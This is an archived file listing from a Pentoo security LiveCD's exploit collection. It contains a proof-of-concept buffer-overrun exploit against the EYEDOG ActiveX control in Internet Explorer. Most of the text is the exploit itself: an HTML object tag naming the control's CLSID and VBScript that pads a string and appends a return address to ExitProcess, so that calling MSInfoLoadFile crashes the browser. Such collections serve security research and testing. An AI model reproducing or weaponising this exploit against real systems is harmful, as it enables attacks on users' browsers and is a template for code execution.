home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / eyedog.txt < prev    next >
Text File  |  2005-02-12  |  955b  |  31 lines

  1. EYEDOG:
  2.  
  3. With this control, MSInfoLoadFile is the offending method. 
  4. There is no easy way to RET to our code, so instead, I have 
  5. shown how to simply RET to ExitProcess directly. This will 
  6. cause the host to terminate.
  7.  
  8. <object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
  9. id="eye"></object>
  10.  
  11. <script language="vbscript"><!--
  12.  
  13. msgbox("EYEDOG OLE Control module Buffer Overrun (Local 
  14. Version)" + Chr(10) + "Written by Shane Hird")
  15.  
  16. 'Padding for the exploit
  17. expstr 
  18. = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  19. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  20. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  21. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  22. AAAAAAAAAAAAAAAAAAAAAAAA"
  23.  
  24. 'RET address (ExitProcess, BFF8D4CA)
  25. expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
  26.  
  27. 'Call exploitable method (MSInfoLoadFile)
  28. eye.MSInfoLoadFile(expstr)
  29.  
  30. --></script>
  31.